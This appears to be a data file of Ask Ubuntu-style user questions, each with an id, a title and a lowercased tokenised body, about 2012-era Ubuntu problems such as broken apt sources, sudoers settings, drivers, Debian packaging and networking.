217380	how to remove wrong command ran earlier ?	i ran command from noobslabs.com deb-src http : //ppa.launchpad.net/noobslab/themes/ubuntu precise main but mistyped to deb-src http : //ppa.launchpad.net/noobslab/themes/ubuntu precise main ain now this wrong command is preventing other apps to work properly and any app i use crashes after sometime . problem shown is : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/noobslab-themes-precise.list ' ] '' how do i fix this ?
217384	update to ubuntu 10.04 did n't work	i installed update to ubuntu 10.04 , but ubuntu does n't work . i see the initial screen to input the user password but next nothing appears , only the mouse , and with the right mouse button , i can access the configuration panel with the background image . how can i solve this problem ?
217385	is it possible to use bzr on launchpad without using port 22 ?	i 'm trying to pull from and push to bazaar branches hosted at launchpad.net but my internet provider is blocking port 22 . is it possible to use port 80 or 443 instead ?
217393	repair 12.10 install from usb boot ?	i upgraded my 12.04 lts to 12.10 but when i login the sidebar and top bars do not load . i get the error `` system program problem detected '' and send an error report . the screen only has the desktop background but i can pull up the terminal okay . is there a repair i can run from the terminal ? i 'd hate to have to install again . i was unable to directly install 12.10 had to do 12.04 lts then upgrade .
217397	can i replace disk containing /home without reinstalling ubuntu ?	i have formatted my hard disks so that /home sits in one separate disk . now that disk has become faulty . i am wondering whether it is possible to replace only that disk and make a new /home partion on a new disk , so that i can avoid a complete reinstall of the os ? ( i know that almost all my user data will be lost )
217398	how can i set up on-the-fly/transparent compression ?	i have huge data sets to deal with , and so my 1tb drive is filling up quickly . however , the data is highly compressible when using lzma ( 7zip , bzip2 ) . the only file system with transparent compression i 've discovered so far is btrfs , which is not assumed stable yet . is there a reliable solution for piping the data through a compression and do a bind-mount to a compressed image file ? any idea is welcome ! i do not want to patch any file system driver though . thanks !
217402	restoring my nexus 7	i have ran through the process to install ubuntu on my asus google nexus 7 tablet . i would like to restore it back to android os 4.1 or 4.2. i have used the how to guide on here and i am unable to get any of the commands to run or work in terminal . please tell me what i need to do . i have the jro03d file and the jop40c file and neither are running for me . from terminal what little i understand of it , it is having trouble with the zxvf part ?
217404	unable to use : nopasswd in sudoers	i have the following sudoers file : misha @ misha-k42jr : ~ $ sudo cat /etc/sudoers [ sudo ] password for misha : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all misha all = ( root ) nopasswd : /sbin/pm-suspend # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d i want to run /sbin/pm-suspend without entering my password . i 'm following this example : specific sudo commands without password however , when i try to suspend , i still get the password prompt : misha @ misha-k42jr : ~ $ sudo /sbin/pm-suspend [ sudo ] password for misha : what am i doing wrong ?
217408	how do i change the live cd 's ramdisk file system size ?	i would like to know which files or script during boot up of ubuntu 12.04 desktop ( 64bit ) sets the amount of ram to allocate to the ubuntu live cd file system . i have 32gb of ram and when i boot into ubuntu it claims 50 % for the file system . so to provent this i would like to fix the amount of ram used by the live cd to 2gb . i should point out that such a change will then be used to remaster the live cd to a customised version . any help as where i should look or what i should change would be of great .
217410	any linux version of clipboardfusion with macros	i have clipboardfusion installed on my windows computer and it has a macro feature that lets me create c # or vb macros that it will execute on the copied text in the clipboard . is there anything like this for ubuntu ?
217412	wifi stops working after update ubuntu 12.10	this is the information i get about my wireless card from running lspci -nn network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
217414	unstripped binary or object creating debian package	i 'm new to package creation and i 'm trying to create a .deb package and keep getting 'unstripped-binary-or-object ' on all my libraries and executables . i have everything setup in the directory tree where i want them to end up ( and a debian folder with the control file ) and then do fakeroot dpkg-deb -- build ./mypackage when i lint with lintian mypackage.deb i get that error . any ideas or suggestions ? thanks
217418	easy way to install crashplan	is there a .deb file , repo , ppa , or anything to install crashplan other than the non-standard install.sh file ? i have fish as my shell , and i had to mess around a lot and finally use chsh first before the install script would even work . i do n't want to have to jump through all these hoops every time there 's an upgrade .
217421	freemind wont run despite openjdk jre installed	i install freemind from usc ubuntu 12.04 , but it failed to run with the following error : '' [ warning ] /usr/bin/freemind : no java runtime was found [ error ] /usr/bin/freemind : unable to find an appropriate java runtime . see java_wrappers ( 7 ) for help '' openjdk java 6 runtime was installed .
217425	font substitution	what happens when you open a .docx document that is written in a font not available on your computer ? how can you find the name of original font ? i guess writer select automatically an other font . i tried to open a document written in japanese . writer shows the fond droid sans , and all the characters except number and roman letters appear as squares . after changing to droid sans japanese a few boxes are still left . i guess i have to install the original font on my computer , but i do not know the name of the font .
217427	problems running 64bit virtual machines in vbox even with a 64-bit os	so i 'm running kubuntu 12.10 x64 : uname -v -p # 29-ubuntu smp fri oct 19 10:26:51 utc 2012 x86_64 and virtual box 4.2 installed from the vbox repositories . any time i try to install a 64-bit os as a guest the install fails and crashes w/ a kernel panic on ubuntu or bombs in windows 7 before it will boot . am i missing something ?
217432	12.10 running 10.4 under vserver	i want to do some testing with bigbluebutton and the installation documentation refers to jaunty 9.04 or lucid 10.04 . i 'm running 12.10 and do n't want to use a vm . can i install 10.04 as a vserver client and run bbb in it ? will there be any problems with library or binary incompatibilities ?
217441	how can i clear the recent files from the movie player menu in 12.04 ?	in 12.04 live-usb , i use movie player to watch movie or music video . all of the movie/music-video titles that i have seen using the movie player appears on the menu ( under the movie tab ) . how to clear this list and how to prevent movie player from showing this list anymore ? i already try the `` delete history '' from the `` privacy '' option in `` system settings '' but it does n't work .
217446	activate swap by default	i installed ubuntu 11.04 natty and i set a partition for swap about 900 mb . afterthat , i installed kubuntu 12.10 quantal , repartitioned my hard disk so i had 2048 mb swap ( replaced 900 mb swap partition ) . i ran kubuntu , and it 's ok . but after i ran ubuntu 11.04 natty , it did n't use that swap . but i can activate it with gparted . some additional information . when i installed kubuntu quantal . i make 256 mb partition ( ext4 mount point in /boot ) which replaced previous 256 mb partition ( ext4 mount point in /boot ) that i created when i installed natty . something wrong with my configuration ? .
217447	mac os x on ubuntu through vmware ?	can i install mac os on my pc through vmware . i 'm using ubuntu 12.04 lts as a host operating system .
217448	can not see eth0 after fresh installation of 12.04.1 in dell ultrabook with window 7	the ifconfig only shows wlan0 and l0 , no eth0 , tried to edit /etc/network/interfaces to asst auto eth0 , then run init.d networking restart , it said , eth0 device can not be found , anyone has similar issue
217449	copying and pasting files . nothing new here	i installed xbmc and it 's working beautifully . i have my own skin i 'd like to use and all i should have to do is copy and past my skin.folder into the addons folder and i 'm down . however , this is n't so easy with ubuntu . i have the latest version , installed today 11-14-2012 could someone please spell out the command process to make this happen ? i 've read through so many forums , tried ssh , i know now i 'm getting into things that could be dangerous so any help would be much appreciated . structure . /home/cantrellsmedia/downloads/skin.cantrell < -- -- - need copied /usr/share/xbmc/addons/ < -- -- -- -- paste some of what i have tried cp skin.cantrell mv skin.cantrell~/usr/share/xbmc/addons/ edit : ok . i screwed up and typed in my bad command line . my bad . yours worked but lacked the -r to copy the file . however ... it only copied the folder and not the contents . now i 'm getting error message cp : can not stat and it reads a list of the contents.any help to solve this would be appreciated .
217453	chown : changing ownership of ` ' : operation not permitted	i know this is possible duplicate but i looked at other answers and was n't satisfied with the responses . you should be able to use the chown command if you are the super user or the owner of the file . well , in my case i am the owner of the file , and i want to use chown . but i want to change ownership of file to super user , so i type following : $ chown root testfile but it gives me error : chown : changing ownership of `testfile ' : operation not permitted however , i am the owner of the file , and granted myself read , write , and execute permission on the file : -rwx -- -- -- 1 viggy viggy 10 nov 14 13:01 testfile so as the owner of the file , why can i not change ownership of the file ?
217455	unmet dependencies when i try to install wine or skype	i have a dell inspiron 64 bit and i 'm running both windows 7 and ubuntu in dual boot i am having trouble installing skype and wine . when i try to install skype etc i get the following error : sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are blockquote using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages
217456	could n't open software center	unable to open software center , it is getting closed suddenly . i tried to reinstall using sudo apt-get -- reinstall software center . i got error as invalid operation software center . i tried to install eclipse and i got like this . sudo apt-get install eclipse reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
217457	how do i get a samsung es 73 camera working ?	i am using a samsung es73 digital camera . i am looking to use this camera on ubuntu 12.04 lts . please guide , how any software can help me transfer or view photos from this camera ? please guide , any device driver which can help me detect this camera .
217461	connection made via sakis3g not recognised by software center	i have used sakis3g to connect to internet as network manager is not able to make a connection although it recognizes the modem.but the problem is many software including pidgin and software center does n't know that computer is already connected to internet and i am having problems installing software especially the debs i downloaded . although i can still download and install packages from terminal . so is there any way i can make software center recognize this connection ? or can i install debs in some other alternative way ?
217463	what is the package and background process for `` network time '' ?	what is the background process of `` network time '' in gnome control center ( gnome system settings ) ? is there a package providing this feature ? i 've noticed that neither ntp nor openntpd are installed in ubuntu 12.10
217464	unable to mount thumb drive	i recently installed ubuntu 12.10 after being out of the linux game for some years ; plugged in usb drive , partitioned , made it a ext4 filesystem and it still says unable to mount : not authorized . just curious if my permissions are being limited over xrdp or did i miss something ?
217466	ubuntu 12.04 , xbmc , opengl , intel motherboard	i 've got an htpc that i built myself , with a asus p5g41t-m motherboard . it 's got an on-board hdmi port , and i 've been using that with no problems . i started out with mythbuntu ( an older version ) , and recently updated to 12.04.1 lts without any issues . i 've been thinking about trying out xbmc for a while , and i decided to give it a go . unfortunately , i seem to be running into quite a few issues . i got xbmc installed from the repos without any issues , but when i try to run it from a console , a box pops up with the following : xbmc needs hardware accelerated opengl rendering . install an appropriate graphics driver . please consule xbmc wiki for supported hardware http : //wiki.xbmc.org/ ? title=supported_hardware in the console , it prints out the following : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 when i run vainfo , i get this : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva : va_opendriver ( ) returns 0 vainfo : va-api version : 0.32 ( libva 1.0.15 ) vainfo : driver version : intel i965 driver - 1.0.15 vainfo : supported profile and entrypoints vaprofilempeg2simple : vaentrypointvld vaprofilempeg2main : vaentrypointvld the file /usr/lib/x86_64-linux-gnu/dri/i964_drv_video.so exists : # ls -l /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so -rw-r -- r -- 1 root root 628728 mar 29 2012 /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so and in /var/log/xorg.0.log the following error pops up : glx error : can not get required symbols . i 'm not really sure where to go from here . i 've tried searching all over for how to fix this problem . i 've done `` apt-get -- reinstall xserver-xorg '' ( as well as a few other video driver packages ) a few times , and no change . any help in getting this issue sorted out would be awesome .
217468	display problems on ubuntu 12.10 : `` error could n't find pll settings for mode ! ''	it seems like there 's been such problems with external monitors for a while , but even if i updated everything i knew that could be upgraded , i still face the same problem . i have an old laptop that its lcd panel is broken and i wanted to convert it into an htpc with xbmc on ubuntu , as i would plug a monitor through its hdmi or vga ports . however , when i tried to install ubuntu 12.04 lts or ubuntu 12.10 , at some point the shell would show something like '' error could n't find pll settings for mode ! i do n't have any log about this error or whatever ( i must admit that i 'm quite new to gnu/linux distros ) , but i somewhat succeeded to bypass the error by plugging the hdmi or the vga cable when the gui was loaded . then , i can follow the procedures while the os is installing , but then comes the reboot , and again , when one of the two display cables are plugged in , this message appears [ 11.533760 ] [ drm : i9xx_crtc_mode_set ] error could n't find pll settings for mode ! [ 11.533771 ] [ dr , : drm_crtc_helper_set_config ] error failed to set mode on [ crtc:4 ] [ 11.548790 ] [ drm : i9xx_crtc_mode_set ] error could n't find pll settings for mode ! [ 11.548791 ] [ dr , : drm_crtc_helper_set_config ] error failed to set mode on [ crtc:4 ] [ 624.009224 ] [ drm : i9xx_crtc_mode_set ] error could n't find pll settings for mode ! [ 624.009228 ] [ dr , : drm_crtc_helper_set_config ] error failed to set mode on [ crtc:4 ] i tried to reboot with the cables unplugged so the gui would load just like when installing , but , when the graphical interface appears , a system box says that the gui could n't load since there was a problem with graphic devices or whatever , and then offers me choices such as entering the console mode , running in safe graphics and 2 other that i ca n't recall , but the cursor is not visible and i ca n't make a choice with the tab or the enter keys . i made a lot of googling before posting , tried many methods such as the nomodeset , upgrading and updating through apt-get . i know there 's been problems with versions 10 and 11 , but i read that such problems with intel cards/chips were fixed with the 3.5 kernel version , which did not change anything for my part ... some specs : brand and model : gateway nv58 cpu : intel core 2 duo @ ~2.10 t6500 ram : 4 gb gpu : intel graphic family express , though i ca n't recall the exact version ... will make further research if needed . thanks for your precious help , and sorry if anything 's unclear , english is not my primary language ^^'
217471	having trouble using ubuntu 12.04 iso in virtual box	i followed step-by-step from this site : installing ubuntu inside windows using virtualbox this is my system info : system information -———————- time of this report : 11/14/2012 , 22:40:29 machine name : christopher-pc operating system : windows 7 home premium 64-bit ( 6.1 , build 7601 ) service pack 1 ( 7601.win7sp1_gdr.110622-1506 ) language : english ( regional setting : english ) system manufacturer : system manufacturer system model : system product name bios : bios date : 02/05/10 19:13:52 ver : 08.00.10 processor : intel® core™ i5-2500k cpu @ 3.30ghz ( 4 cpus ) , ~3.3ghz memory : 8192mb ram available os memory : 8174mb ram page file : 2227mb used , 14117mb available windows dir : c : \windows directx version : directx 11 dx setup parameters : not found user dpi setting : using system dpi system dpi setting : 96 dpi ( 100 percent ) dwm dpi scaling : disabled dxdiag version : 6.01.7601.17514 64bit unicode dxdiag previously : crashed in direct3d ( stage 2 ) . re-running dxdiag with “dontskip” command line parameter or choosing not to bypass information gathering when prompted might result in dxdiag successfully obtaining this information i get the following virtualbox error : failed to open a session for the virtual machine ubuntu 64bit . vt-x features locked or unavailable in msr . ( verr_vmx_msr_locked_or_disabled ) . result code : e_fail ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } i have no idea what 's going on . i got ubuntu up on running on my laptop , but i just got a desktop and i ca n't seem to get it working . downloaded ubuntu-12.04.1-desktop-i386 from ubuntu 12.04.1 lts ( precise pangolin )
217472	ubuntu software center buy button does n't work	i just bought the new humble bundle , and i want to play the games on ubuntu , but whenever i click on `` download with ubuntu '' the software center comes up on the page of the game , but whenever i click on the buy button it comes up with this message : unable to load page problem occurred while loading the url https : //apps.ubuntu.com/cat/tos/plain/ can not resolve proxy hostname ( ) and so i ca n't buy the games . could someone please help me ? thank you for reading , ~joel
217474	no sound in my hp 2000-2116tu laptop	i am using hp 2000-2116tu laptop and i have installed ubuntu 10.04 in it ( i 'm dual booting it along with windows 7 ) . the problem is that there is no audio ( no audio in speakers as well as headphone ) . the sound card in my lap is realtek hd audio . i guess ubuntu is not recognising my sound card . maybe it is the lack of proper drivers . so please help me to fix this problem . the sound card is fine since it works perfectly in windows 7 .
217477	find all files on the filesystem that i have edited or created	in ubuntu , is it possible to obtain a list of all files on the filesystem that i have edited ? i need some way to find all the files that i have modified or written ( because these files tend to be the most important to me , and i need a way to identify them so that i wo n't accidentally delete them . )
217478	are $ reboot and $ shutdown -r now different ?	i was receiving the following notification at the end of my message of the day *** /dev/xvda1 will be checked for errors at next reboot *** i did the following $ touch /forcefsck $ shutdown -r now but when i rebooted /forcefsck still existed and i was receiving the same warning at the end of the message of the day . i then ran $ reboot and now i longer receive the error at the end of the message of the day ( i assume running fsck correctly this problem )
217480	no sound except with flash player in firefox . sound app only shows `` dummy output ''	using a dell 8400 with an ac97 type soundcard . ubuntu 12.04 ( 3.2.0-32-generic-pae ) everything is updated . i only get audio through my soundcard when using adobe flash player for firefox . nothing else works , rhythmbox , movieplayer , vlcplayer , etc . these had worked prior . in my dash the `` sound '' app only shows `` dummy output '' as the only output and the recorder shows nothing for input choice . did show other choices prior . the systeminfo shows the driver for the sound card . i believe problem began when i installed flash player through ubuntu software center , but not sure . do n't know where to go from here . any suggested terminal commands or fixes . thanks .
217483	which graphics-driver is used ? ( multiple drivers installed )	i have to set up one ubuntu 12.04-image for diffrent hardware ( pc 's , notebook 's , etc ) my question : how do i support most of the graphics cards in my hardware ? ! is it useful to install the ati and nvidia driver ? ! does the hardware automatically choose the right drivers ? greets , tom
217491	get rid of unity without login-screen and root	before close as duplicate please read my constraints : i have no root my box is a 12.04. virtual machine in some rack i login from windows using nomachine nx , it directly sends me to the desktop , no login on the ubuntu box , when i logout , the nx-connection is disconnected . i assume that the classic desktop is installed by default . how can i check ? how can i configure my account to use the classic desktop ? e.g . using settings-panel or gnome-config ?
217492	is dh-make the standard way to build debian packages ?	i 've started creating a .deb package for my software a while back and the method i 've stumbled upon then ( i knew nothing about the domain ) basically is like this : create a directory structure like this -- pkg-dir -- debian -- controlfile -- postinst -- postrm -- conffiles -- usr -- share -- myapp -- etc -- myapp fakeroot dpkg-deb -- build pkg-dir lintian pkg.deb however these days the info i 'm finding all point to dh-make . is dh-make the new or preferred way ? where does my method come from ? i 'd like to use the standard way in future but for now i 'd like to finish what i 've started using this as i 'm pressured for time . where do i get more info on my method ?
217493	fresh install of 64 bit 12.04 over 32 bit 11.10 alongside windows 7	i currently have ubuntu 11.10 32 bit and windows 7 dual boot in separate partitions . i am trying to do a fresh install of ubuntu 12.04 64 bit ( mistakenly installed the 32 bit 11.10 a little while ago.. i need a 64 bit version to support aosp build ) over my the exisiting 11.10 partition . i have referenced how to install fresh 12.04 install to a pc with dual booting windows 7 & ubuntu11.10 ? , as well as other posts on using the live cd to do a fresh install . however , the problem i am experiencing is when i bring up the install screen , it says the following : this computer has multiple operating systems on it . what would you like to do . ( 3 options ) install ubuntu 12.04 alongside them replace all with ubuntu 12.04 ( warning , this will delete files across all operating systems ) something else ( you can create or resize partitions yourself ) this is different from what is in other posts , as mine states that there are `` multiple o.ses '' and doesnt individually allow me to replace the ubuntu 11.10 . i do n't want to replace all o.s.es : i need to preserve windows 7 and am only trying to replace the old ubuntu 11.10 partition with the new 12.04 64 bit . i did have ubuntu installed via wubi ( i believe it was 10.04 ) prior to putting 11.10 in a separate partition , but i have removed it via add/remove programs in windows . i was wondering how to go about doing this ... should i use the `` something else '' option to bring up the partition manager , and just assign my existing 11.10 partition with root mount point + swap space . will this do the same thing by overwriting with fresh 12.04 install ? ? i appreciate all your help .
217494	how to create an ubuntu 12.10 live cd ?	i downloaded the ubuntu 12.10 installer from ubuntu website . however , i find that it is not an iso image and i am unable to create a live cd ( or dvd ) from it . i could not find any help from ubuntu website as well as internet . please help . ps - my os is windows xp . the ubuntu installer i downloaded from ubuntu website is a zip file . i unzipped the file and it has a wubi file . ps - thanks . i could create a live cd . 1 ) first i tried to do it in my laptop which has win 7 . it was showing the ubuntu installer as a zip file and could not able to burn it in to a dvd . at that time i raised the question . 2 ) later i copied the installer in my desktop which has win xp . there the installer is shown as an iso file and i burnt it in to a dvd and created the live cd . this is working nicely in the the desktop . 3 ) i tried to run the live cd in my laptop which is an amd machine , the system does not boot up . 4 ) in my office desktop which has win 7 the ubuntu installer is showing as an iso file . my questions are as follows : a ) why the ubuntu installer file is showing differently in different machines ? b ) why the live cd is not working in my laptop ?
217495	why ca n't i see scrollbars arrows in some windows ?	i 'm running unity on ubuntu 12.10 , with overlay scrollbars set to false ( this behaviour occurs even with overlay scrollbars purged , so this answer ca n't help ) . as the question 's title suggests , some windows wo n't show the up and down arrows at the top and bottom edges of right scrollbars , nor the left and right arrows at left and right edges of bottom scrollbars , if they 're needed . some examples : terminal windows - > no arrows gedit windows - > no arrows nautilus/folders windows - > no arrows firefox windows - > arrows ok pidgin windows - > arrows ok thunderbird windows - > arrows ok skype windows - > arrows ok compiz config settings manager windows - > arrows ok synaptic windows - > arrows ok libreoffice windows - > arrows ok i 'm using ambiance gtk and windows theme , but the issue occurs with each other theme .
217499	how to connect android phone with ubuntu 12.04 laptop for accessing laptop 's internet connection over wifi	i have an android ics phone and i want to use my wired internet connection on my laptop through wifi . it can be done easily on windows 7 using softwares like virtual router or connectify . is there any similar software for ubuntu . i am new to linux . i have 1.android 4.0.4 2.ubuntu 12.04
217502	speed up apt-get update by removing known ignored translation-en	i 've mirrored some ubuntu repositories to a an internal repository using apt-mirror however due to http : //serverfault.com/questions/93437/apt-mirror-does-not-mirror-the-i18n-directory i get the following : ign https : //internalrepo precise-updates/main translation-en ign https : //internalrepo precise-updates/multiverse translation-en ign https : //internalrepo precise-updates/restricted translation-en ign https : //internalrepo precise-updates/universe translation-en now i 'm trying to speed up as there are quite a few of these that slow down the apt-get update on our machines . is there any way i can tell the sources.list.d files or apt-get to do n't even attempt to get these ( i guess this would speed it up more than hitting an ignore ) ? using ubuntu 12.04
217503	how to publish your key used to sign deb packages so you will be able to use your repository from any machine ?	i am looking for a solution that would prevent me from seeing things like : w : gpg error : http : //updates.example.com lenny release : the following signatures could n't be verified because the public key is not available : no_pubkey 00aabbccddee0011 the question applies for both debian and ubuntu . is n't possible to publish the key somewhere where it can be automatically downloaded by apt-get based on it 's signature ? note : i know that i can put my signature to an we server and use wget to get it and install it from there , still i am using for a better solution .
217504	how to rename more than one files in ubuntu ?	i have so many images more than 100 in a folder such as : apple.jpg grapes.jpg orange.jpg ... . i want to rename all of them at once with ascending order numbers such as : 1.jpg 2.jpg 3.jpg ... . how can i do it using ubuntu 10.04 ? is there any terminal command to do it .
217505	how can users rate apps ?	is there an uri we can open from an app so that the user is redirected to the ubuntu app store client in order for the user to be able to rate the app ?
217508	ubuntu app stores and 32 and 64 bits apps	is there any tutorial to submit applications in multiple architectures ? if only one architecture is submitted , i guess 64 bits is recommended today ? ( do we have stats on how many users use 32 vs 64 bits ? ) do we need to create 2 apps with 2 different package and version names ? do we have to take into consideration multiarch ? other tips appreciated : )
217511	terminal line height for nice `` tree '' ascii art display	applications like tree use some special characters to display ascii art . unfortunately , gnome-terminal has a line height higher than the characters , giving spaces between the lines . see the screenshot : is there a way to get rid space between the lines and have a nicer tree display ?
217513	how to prevent autossh from becoming stuck once in a while ?	i am using autossh to build a reverse ssh tunnel but from time to time the tunnel stops working and i need to kill autossh and start it again . /etc/cron.d/autossh @ reboot autossh -f -nnt -r 3269 : intranet.example.com:3269 public.example.com & autossh seems to remain in a strange state , where the forwarded port is still open but you get no response from the other side . by restarting autossh this is solved . how can i prevent this problem from occurring ?
217514	how do i install gallium3d drivers in ubuntu 12.10 ?	i am having horrible problems with the latest ati graphics driver . i have an ati radeon hd 5800 and i just lost my gui for linux ( typing this in windows at the moment ) . i 've read about gallium3d being great drivers , but i ca n't find anything any where how to install these drivers or where to get them . can anyone help ?
217517	ubuntu 12.10 modem connected but no internet	i was previously running ubuntu 12.04 and upgraded to ubuntu 12.10 . previously on 12.04 when i removed my wired ethernet connection and plugged in my 3g modem i was immediately able to browse the internet . however now on 12.10 i am unable to do so , even though the modem shows that it is connected when i go to firefox or chrome it displays an error . in order for my 3g to work i need to restart my machine ( without the ethernet cable plugged in ) and then plug in the 3g modem . it then works . please help or advise what i can do . thanks .
217518	unable to start apache on ubuntu 12.10 : no listening sockets available	i 'm unable to start apache2 installed using apt-get . i 'm getting the very same error on 2 separate ubuntu 12.10 installations , one on my desktop pc , the other one running in virtualbox : michal @ michaltest : ~ $ sudo service apache2 start * starting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . [ fail ] lsof says : michal @ michaltest : /var/log/apache2 $ sudo lsof -i :80 command pid user fd type device size/off node name ubuntu-ge 2074 michal 11u ipv4 23978 0t0 tcp michaltest.local:47578- > mulberry.canonical.com : http ( close_wait ) firefox 25194 michal 71u ipv4 42477 0t0 tcp michaltest.local:59793- > 69.59.197.29 : http ( established ) firefox 25194 michal 76u ipv4 41834 0t0 tcp michaltest.local:59698- > 69.59.197.29 : http ( established ) gvfsd-htt 25320 michal 12u ipv4 42568 0t0 tcp michaltest.local:56203- > lb260.amst.cotendo.net : http ( close_wait ) netstat says : michal @ michaltest : /var/log/apache2 $ sudo netstat -lnp | grep '80' unix 2 [ acc ] stream listening 8030 876/acpid /var/run/acpid.socket /var/log/apache2/error.log : [ thu nov 08 11:13:30 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) configured -- resuming normal operations [ thu nov 08 11:17:32 2012 ] [ notice ] caught sigterm , shutting down /etc/apache2/ports.conf : namevirtualhost *:80 listen 80 < ifmodule mod_ssl.c > listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > thanks for your help . edit # 1 : michal @ michaltest : ~ $ sudo netstat -ano | grep '443' tcp 54 0 10.0.2.15:58504 91.189.92.70:443 close_wait off ( 0.00/0/0 )
217520	fingerprint driver issue hp pavilion dm4	i need a fingerprint scan driver for pavilion dm4 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 0a5c:21e3 broadcom corp . bus 001 device 004 : id 138a:0018 validity sensors , inc . bus 002 device 003 : id 10f1:1a2e importek
217522	python script not executing after setting executable permission	i am having a python script # ! /usr/bin/env python in top of my script ? following is the permission i had set -rwxr-xr-x 1 user1 user2 6423 nov 15 15:12 test i tried executing the script as user1 ./test its giving me permission denied ? when i do whoami it shows user1 and umask is 0022 , user1 has bash as his default shell $ python test ( it works fine ) any ideas ? ?
217524	raid advice with ssd and two hdd	i have a new machine with one 128gb ssd and two 1tb hdd . on the ssd is the os and my initial thought was to put the two hdd in raid 1 for user data . after some more thought i came up with two other setups and now i 'm in doubt : ) can someone advise what would be the best setup ? 1 : single ssd and hdd in raid 1 ( original thought ) 2 : create 2 partitions on the hdd ( 128gb and 872gb ) . put the two 872gb in raid 1 and create another raid 1 with the ssd and one 128gb hdd partition . 3 : create 2 partitions on the hdd ( 750/250 ) , put the 705gb in raid 1 and use the 2 250gb as backup and make automatic snapshots of the ssd to ( one of ) these partitions . i think the 2 main questions are : is it advisable to create a raid array with only part of a drive and actively use the other part of that drive or should you always use the full disk ? is it advisable to create a raid 1 array with a ssd and hdd or will that blow the whole speed advantage of the ssd ?
217527	external monitor problems with asus ux32vd in 12.04	i 've posted this video where i show one of the problems i 'm facing with my ux32vd in regard of external monitors . as you can see as soon as i plugged the external monitor the laptop screen goes black and the external monitor displays a single color ( color changes between red , green and blue ) . however this does not always happen . for instance if i reboot the laptop with the external monitor already plugged in i get to use it but not the laptop screen . in the displays settings the laptop screen it 's not even listed . other times it just works . the to screens , without any problems . i tried with other to different external monitor and all this apparently random issues repeat , i even tried using hdmi cable instead . same random behavior . this question seams to cover one of this issues however the answer did not helped me . i was forced to use the 3.5.2 kernel in order to use the intel graphics card else the gallium something was used . also i 've bumblebee installed .
217530	bluetooth driver not working on an hp pavillion dv6 6155tx	in my hp pavillion dv6 6155-tx everything is working just fine except for the bluetooth . i have pretty much tried every bluetooth software out there but none seems to work . it seems that the driver is not installed or something like that . when i search for new devices it just dont find any device and the vice versa . please kindly help me ! i am frustrated for more than 4 months now searching for some answers . the output of rfkill list : - 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hp-wifi : wireless lan soft blocked : no hard blocked : no 3 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no
217531	vesa : m92 standard , but ati driver installed ? ( 12.04 lts )	i have a dell studio 1555 with an ati mobility radeon hd 4500 , and i have installed the proprietary driver but when i go to settings > details > graphics , ubuntu tells me the driver is vesa : m92 , experience : standard . the driver has definitely installed correctly as i can get up the catalyst control centre and change settings which effect what i see . so is this just a false indication or am i not getting the full experience out of my video card ?
217532	dig @ server does n't work	i have ubuntu 12.04 with bind9 , working just as a caching server ( forwarding to 8.8.8.8 ) . when i use , for example , dig +norecurse @ l.root-servers.net www.uniroma1.it , i obtain the following output : ; < < > > dig 9.8.1-p1 < < > > +norecurse @ l.root-servers.net www.uniroma1.it ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached using wireshark i discovered that the outgoing queries are correct , but there are n't any incoming answers . why ? p.s . using simply dig www.uniroma1.it i obtain the correct answers .
217533	building package from binary files - what 's wrong with my control file	i 'm busy trying to build a .deb package from the binaries of my application ( non open source ) and i 'm having trouble getting the correct info to display in the ubuntu software centre ( when you click on the .deb file ) . please see screenshot below of control file and software centre view . it seems like the package name and the package description is swapped . i 'm expecting the part in bold to read `` attix5pro '' and not `` cloud backup agent '' . can someone show my my mistake or guide me ?
217536	how to find all the files related to a software ?	i 'm not sure if it is possible , but if it is , how can i find all the files related to a software ? for example , is there anyway to find all files that gedit needs and uses to work ? does such command/techniques gather files like /usr/share/gtksourceview-3.0/styles/oblivion.xml which is not dedicated only to a certain software or owned by a different one ?
